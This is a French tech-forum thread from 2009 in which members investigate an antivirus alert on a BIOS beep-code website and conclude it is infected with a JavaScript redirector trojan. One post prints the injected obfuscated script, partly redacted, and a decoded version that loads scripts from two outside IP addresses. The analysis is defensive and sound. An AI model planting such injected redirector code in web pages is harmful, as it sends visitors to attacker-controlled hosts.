|
|
|
Auteur
|
Message
|
1
|
|
|
|
bonjour dans le n 565 de micro hebdo j'ai voulut savoir a quoi correspondait les bips (on ne sait jamais) de mon bios
alors je suis aller sur hxxp://www.bioscentral.com et avast me dit qu'il est infecter et m'oblige a arrêter la connexion au site alors es-ce dangereux ou un faux positif
donc merci d'avance pour la reponce merci
PS:le trojen s'appelle JS:Redirector-D [Trj]
-->Message édité par masmat le 16/02/2009 19:13:35<--
|
|
parrain de 4 poumons
|
|
|
si le lien a été donné par Micro Hebdo, alors il s'agit peut être d'un faux positif, cependant, le site pouvait très bien être sain au moment du passage des rédacteurs du magazine dessus, mais entre temps, les auteurs du site ou un pirate ont pu en modifier le contenu.
tant que la confirmation du statut de ce site n'est pas officiellement démentie, j'invite tous les internautes qui cherchent une explication aux Bips de leur BIOS à consulter ce site qui est une très bonne alternative a bioscentral.com
http://www.pc-tests.com/Forum/index.php?topic=21834
sinon, en attendant, et dans le doute, j'ajoute ce site (bioscentral.com) à la liste des sites infectés ici http://forum.telecharger.01net.com/microhebdo/questions-techniques-diverses/t(...)
pourrais tu remplacer le http:// de ton lien vers bioscentral.com par hxxp:// celà permettra de mettre le lien hors service pour éviter une eventuelle contamination. Merci à toi, je te tien au courant si j'ai du nouveau concernant cette affaire
-->Message édité par dj QUIOU le 13/02/2009 17:04:00<--
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
Micro hebdo reader
|
|
|
J'y suis aller avec Antivir et rien ...
Wait & See
|
|
|
|
|
voila ce qui apparaît sur le site avec avast
-->Message édité par masmat le 14/02/2009 11:21:32<--
|
|
La Mayenne-son calme -sa verdu
|
|
|
Faux positif comme le signale "dj QUIOU" car même WOT de fireFox le signale comme nickel.
|
|
Micro hebdo reader
|
|
|
Il faut attendre la réponse de dj QUIOU pour voir si le site est vraiment dangereux ou pas . Encore aujourd'hui rien chez moi avec Antivir.
|
|
Micro hebdo reader
|
|
parrain de 4 poumons
|
|
|
bonjour à tous, c'est étrange que ce site soit détecté par avast si les protections de WOT ne voeint rien, lequel des deux à raison , je vais essayer de récupérer le code source de la page pour voir quelle partie du code crée ce faux positif, en attendant, prudence, rien n'a été donné comme explication sur le site d'avast, je vais leur soumettre ce problème , je vous tiens au courant rapidement
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
parrain de 4 poumons
|
|
|
voilà, j'ai posté un mail sur le forum d'avast en espérant avoir du nouveau sur cette affaire, pour ceux qui comprennent l'anglais, vous pouvez suivre l'avancement ici http://forum.avast.com/index.php?topic=42630.0
je vais essayer d'isoler la partie infectieuse du code source pour plus d'infos , je vous tiens au courant
-->Message édité par dj QUIOU le 14/02/2009 20:23:28<--
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
parrain de 4 poumons
|
|
|
c'est bon , la partie infectieuse est isolée,, Bernard53, je te l'envoie en MP je ne la poste pas en clair sur le forum pour des raisons de sécurité
alors j'ai du nouveau, apparement, Avast n'est pas le seul a détecter cette cochonnerie sur ce site, la preuve ici
apparement le membre du forum qui m'a répondu a des doutes sur la légitimité de ce compteur nommé "Yahoo counter"
et il a isolé la même partie du code source que moi, on attends la suite ...
sinon, c'est peut être une simple conicidence, mais le dernier lien du screenshot que donne Bernard53 indique que "bioscentral est un site du groupe Alexa" (qui à développé un spyware éponyme il y a quelques années )
-->Message édité par dj QUIOU le 14/02/2009 20:29:19<--
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
Micro hebdo reader
|
|
il fait froid ici......
|
|
Micro hebdo reader
|
|
parrain de 4 poumons
|
|
|
y'a du nouveau surle forum d'Avast toujours pas de certitude qu'il s'agisse d'un faux positif, mais les doutes persistent, Jean michel, le bout de code crypté qui est infectieux contient 2 IP lorsqu'il est décrypté:
l'une pointe vers le luxembourrg, l'autre pointe ver le royaume uni, mais elle est tout de suite redirigée vers la russie, bizarre pour un compteur de statistiques censé appartenir a Yahoo, les techniciens d'avast trouvent étrange que ce bout de code soit arrivé là sur Bioscetral . pour l'instant voilà ou l'on en est.
J'attends d'autres signes de la part d'avast qui pourraient nous donner le fin mot de l'histoire.
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
La Mayenne-son calme -sa verdu
|
|
|
OK j'ai bien vu toutes les réponses et suis cela de près.
|
|
parrain de 4 poumons
|
|
|
bon j'ai analysé le code source avec Virustotal.com
et verdict: 2 antivirus sur 38 trouvent ce fameux trojan JS-Redirector-D
regardez ici
http://www.virustotal.com/fr/analisis/2087607cbe2fc00b1cf94690f801c8a3
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
il fait froid ici......
|
|
Micro hebdo reader
|
|
|
Petite question:
Si se n'est pas un faux positif, quel est le risque
|
|
parrain de 4 poumons
|
|
|
justement, si ce n'est pas un faux positif, le but de cette bestiole JS:redirector-D est de rediriger ton PC vers la russie et de modifier ta page d'accueil du navigateur voire même celà peut aller jusqu'a une tentative de hammeçonnage, en gros on a affaire a un détournement d'adresse IP. si c'est une vraie bestiole, mais vu le code source, on est bien redirigé en russie donc méfiance...
-->Message édité par dj QUIOU le 15/02/2009 12:00:47<--
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
Micro hebdo reader
|
|
|
Merci pour ces précisions
Je n'irait plus sur se site tant qu'il n'est pas "sûr".
|
|
Micro hebdo reader
|
|
|
|
Si le site est vraiment dangereux, il est bizarre que seulement deux antivirus le détecte ...
|
|
il fait froid ici......
|
|
parrain de 4 poumons
|
|
|
Jeanmimigab, c'est normal, toi tu as scanné tout le code source en format HTML, moi j'ai scanné juste la partie infectieuse en format.txt, ce qui la rend innofensive, dans ton fichier en revanche elle est active car le format d'enregistrement prends en compte le langage unescape. Sophos antivirus ne détecte donc ce genre de virus que lorsqu'il est actif c'est toujours bon à savoir, je t'ai envoyé une analyse poussée de cette bestiole par MP
Merci pour ce test qui confirme nos doutes
-->Message édité par dj QUIOU le 15/02/2009 12:30:36<--
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
parrain de 4 poumons
|
|
|
Après mêtre entretenu avec Jeanmimigab et bernard53 en MP, j'ai décidé de vous poster l'analyse technique du code source de la page d'accueil de bioscentral.com
voilà la partie de code infectieuse qui se situe tout en bas du code source de la page, comme si quelqu'un l'avait rajoutée a la dernière minute.
pour des raisons de sécurité j'ai volontairement retiré et remplacé par des étoiles une partie du code pour éviter ques des petits malins ne recréent le virus, et aussi pour protéger le forum!
<script language=javascript><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F%2F|%3C%64`i%76%20@s~%74~%79le=d%
69|sp!l`a@y:%6E%6F&%6E%65%3E\n%64%6Fcu%6De#n|%74!.%77%72`%69#%74~e("%3C%2F`tex%74$%61!%
72~%65a~%3E|%22$%29%3B~%76&ar%20#i%2C`_`,%61=~%5B"%37%38~.%3110%2E@1!7%35#.`%32&%31",%2
***************************
`c$%6F&%6F%6B~%69e%2E%6D!a&%74~c~h($%2F&%5C`bhg%66|%74=`%31%2F%29!=$%3D&%6E%75l|%6C)%66
!%6F~%72%28|%69$%3D%30`%3Bi&%3C!%32`;@%69~++`)~%64%6F%63%75$%6D%65%6E!t#%2E%77%72~%69|t
%65~%28$%22%3C$%73#%63&%72&i&%70t`%3Ei~f~%28!%5F`)!%64%6F|c$%75`m~%65%6Et`.&wr%69|%74&e
@(%5C%22~%3C%73#%63%72%69p!t%20%69%64`%3D%5F"%2B%69~%2B$%22$%5F@%20s|r!c=/#/&"+&a@[~i]%
2B"@%2F@%63p/%3F%22@+na%76$%69%67%61%74&o#%72%2E#a@%70$%70%4E%61%6D%65%2E~%63h|%61r@A%7
4~(%30`%29+"%3E%3C#%5C%5C~%2Fsc$%72%69!pt%3E|%5C"%29|%3C&%5C/s@%63%72i@pt!%3E#%22!)|%3B
&\n|//#%3C$%2F%64%69%76%3E').replace(/\$|\&|~|#|@|`|\||\!/g,""));var yahoo_counter=1;
<!-- counter end --></script>
apparement c'est le code pour un compteur qui n'apparait pas sur leur site et il est crypté en unescape,
une fois le code décrypté on obtiens ceci:
'//|<d`iv @s~t~yle=d%
69|sp!l`a@y:no&ne>\ndocume#n|t!.wr`i#t~e("</`text$a!%
72~ea~>|"$);~v&ar #i,`_`,a=~["78~.110.@1!75#.`2&1",%2
21~95.!2|4$.7`6@.2#5&1`"]&;|_=@1;$if`(&d#ocum@ent`.
`c$o&ok~ie.m!a&t~c~h($/&\`bhgf|t=`1/)!=$=&nul|l)f
!o~r(|i$=0`;i&<!2`;@i~++`)~docu$men!t#.wr~i|t
e~($"<$s#c&r&i&pt`>i~f~(!_`)!do|c$u`m~ent`.&wri|t&e
@(\"~<s#crip!t id`=_"+i~+$"$_@ s|r!c=/#/&"+&a@[~i]%
2B"@/@cp/?"@+nav$igat&o#r.#a@p$pName.~ch|ar@A%7
4~(0`)+"><#\\~/sc$ri!pt>|\")|<&\/s@cri@pt!>#"!)|;
&\n|//#<$/div>
ici le script est codé en "leet speak" mélangé a des caractères spéciaux, une fois qu'on les retire ;c'est le boulo de cette partie du code: document.write("</textarea>");var i,_,a=["78.110.175.21","195.24.76.251"];_=1;if(document.cookie.match(/\bhgft=1/)==null)for(i=0;i<2;i++)document.write("<script>if(_)document.write(\"<script id=_"+i+"_ src=//"+a+"/cp/?"+navigator.appName.charAt(0)+"><\\/script>\")<\/script>");
on remaque des IP dont on déterminera la provenance en regardant ici http://www.ip-adress.com/ip_tracer/195.24.76.251
et ici http://www.ip-adress.com/reverse_ip/78.110.175.21
et on obtiens ensuite ce code final
_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i+"_");if(d)d.src=""}eval(unescape('#/%2F#%4Au`s|t%20%66uc!k%20~of%66.#%2E.$ #%3C%64!i%76%20|s%74%79!%6C$e~=$d$%69s$%70%6C|%61y%3A%6E!%6F`%6Ee`%3E|\n%76%61|r~ @%74!%3D!n#%65w D$%61|t%65(!12`%334%37333~70$%30|%30$%30)`;#%64ocu!%6D%65!%6E@%74%2Ec%6F%6F#%6B@%69e=%22!%68%67f%74~%3D@%31%3B~%20e$xp%69|r@e|s%3D~"~%2B`%74.%74~o#%47|MT%53!%74$r`%69n%67!()+@%22#;@ %70a%74%68%3D|/!%22!;\n%2F%2F`%3C#/$d~i%76~%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));
comme vous le remarquez , ce code en javascript est encore crypté en unescape, on le décrypte et voilà ce qu'on obtiens:
#//#Ju`s|t fuc!k ~off.#..$ #<d!iv |sty!l$e~=$d$is$pl|ay:n!o`ne`>|\nva|r~ @t!=!n#ew D$a|te(!12`347333~70$0|0$0)`;#docu!me!n@t.coo#k@ie="!hgft~=@1;~ e$xpi|r@e|s=~"~+`t.t~o#G|MTS!t$r`ing!()+@"#;@ path=|/!"!;\n//`<#/$d~iv~>'
regardez par quoi commence ce code
et quand on réutilise cette partie du code pour retirer le superflu
replace(/@|\!|~|\?|#|\$|`|\|/g,""));
on obtiens: //Just fuck off... <div style=display.none> new date.document.cookie=expires:[GMT]; string.path=""</div>
vous en connaissez beaucoup des sites de confiance qui cachent dans leur code source un code qui inscrit dans un cookie "JUST FUCK OFF"
fuck off signifiant en francais "va te faire f**tre"
Voilà ou on en est pour l'instant sur cette affaire, c'était déja expliqué sur le forum d'avast par un technicin, mais ne anglais et beaucoup moins détaillé, c'est pourquoi je vous informe plus et en francais.
j'attends confirmation des techniciens d'Avast pour rendre le verdict à prpos de ce site. celà ne devrait plus trop tarder
-->Message édité par dj QUIOU le 15/02/2009 12:44:30<--
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
Micro hebdo reader
|
|
|
On dirait comme tu le dit un bout de code ajouté "vite fait"
Merci pour toutes tes infos !
@+
|
|
Micro hebdo reader
|
|
|
dj QUIOU a écrit :
Jeanmimigab, c'est normal, toi tu as scanné tout le code source en format HTML, moi j'ai scanné juste la partie infectieuse en format.txt, ce qui la rend innofensive, dans ton fichier en revanche elle est active car le format d'enregistrement prends en compte le langage unescape. Sophos antivirus ne détecte donc ce genre de virus que lorsqu'il est actif c'est toujours bon à savoir, je t'ai envoyé une analyse poussée de cette bestiole par MP
Merci pour ce test qui confirme nos doutes
J'ai isolé le bout de code, je l'ai enregistré dans un fichier texte et pourtant il y a bien 3 antivirus qui le détecte .
http://www.virustotal.com/fr/analisis/46c9bf47c9e4c39c9a2bb0439a0df4c6
|
|
parrain de 4 poumons
|
|
|
ah c'est étrange, c'est êut etre du au fait qu'un 39 eme antivirus ait été rajouté, peut etre sophos a été mis ajour aussi en même temps, en tout cas c'est une bonne chose
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
parrain de 4 poumons
|
|
|
bon apparement , pour eux ce site est bien infecté, et il n'est pas bon de s'y promener, regardez, ils m'ont donné ceci en plus https://safeweb.norton.com/report/show?url=www.bioscentral.com&x=0&y=0 , celà fait encore un antivirus qui détecte cette bestiole, ça fait beaucoup pour un faux positif
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
il fait froid ici......
|
|
|
Sir dj QUIOU ,congratulation
|
|
parrain de 4 poumons
|
|
|
thank you very much my colleague
pour ceux qui n'auraient pas le courage de lire tout le topic:
verdict: Ce n'est pas un faux positif, le site Bioscentral.com est bien infecté par [trj] JS:Redirector-D
-->Message édité par dj QUIOU le 15/02/2009 20:29:17<--
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
|
|
|
|
bon j'ai une question si j'ai ete infecter par le trojen alors quel son les signe de cette salete
|
|
parrain de 4 poumons
|
|
|
tu n'a a mon avis pas été infecté, car Avast est un bon antivirus et il a bloqué la conexion au site.
Cependant, si tu constate lors de tes cscéances de surf, une modification de ta page d'accueil du navigateur, ou que tu reçois des publicités intempestives ou encore des spams par dizaines dasn ta boite mail, alors ces signes peuvent être du a ce trojan, mais avec Avast, tu semble bien protégé
n'hésites pas a faire une analyse complète de ton PC avec Avast
-->Message édité par dj QUIOU le 15/02/2009 20:43:12<--
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
Micro hebdo reader
|
|
|
pour cette réponse claire Il faut voir si dans les prochain jours d'autre antivirus detecte ce site (Antivir,Kaspersky etc ...).
Il faudrait peut être passer un mot dans le prochaine Micro-Hebdo
|
|
parrain de 4 poumons
|
|
|
oui , un simple petit encadré donnant un lien alternatif, je vais contacter Le redacteur en chef pour lui demander de passer lire ce topic
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
La Mayenne-son calme -sa verdu
|
|
|
|
|
bon je passerai une analyse rapide avec avast
encore merci et au revoir
|
|
parrain de 4 poumons
|
|
|
masmat a écrit :
bon je passerai une analyse rapide avec avast
encore merci et au revoir
mieux vaut passer une analyse complète, l'analyse rapide ne prenant en compte qu'un certain type de fichiers et de dossiers
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
|
|
|
Bonjour !
Merci pour ce beau boulot. Voici donc le texte qui passera dans la partie forum du numéro 568 de Micro hebdo :
Docteur Micro : Merci à djQuiou, de l’équipe sécurité du Forum de Micro hebdo, pour ses investigations. Il en ressort que les analyses de différents antivirus ne concordent pas entre elles. Néanmoins, certaines laissent à penser que ce site pourrait effectivement être infecté par un logiciel malveillant. Telle celle de Norton Safe Web (https://safeweb.norton.com/report/show?url=www.bioscentral.com&x=0&y=0). La prudence étant de mise, nous invitons donc qui souhaite néanmoins savoir à quoi correspondent les bips émis par son PC au démarrage, à se rendre sur cet autre site (sûr et en français) : www.pc-tests.com/Forum/index.php?topic=21834.
Bien amicalement,
DualBoot
-------
There's something in the air.
|
|
parrain de 4 poumons
|
|
|
DualBoot Un grand Merci à toi et à SuperDupond.
encore une fois on peut souligner le professionnalisme et la transparence de MicroHebdo pour ses lecteurs.
A+
-------
-lorsque ton topic est résolu indique le comme ceci [résolu] dans ton titre en cliquant sur ![[:dj QUIOU:1] [:dj QUIOU:1]](/data/globaldata/usmilies/djquiou-1.gif) de ton premier message.
- Astuces informatique, Sécurité, Optimisation windows XP et Vista, Programmation, Tutoriaux => http://pc-system.fr
|
|
|
|
|
|
desoler mais dans le n°568 je ne vois aucun article parlant de ca
|
|
1
|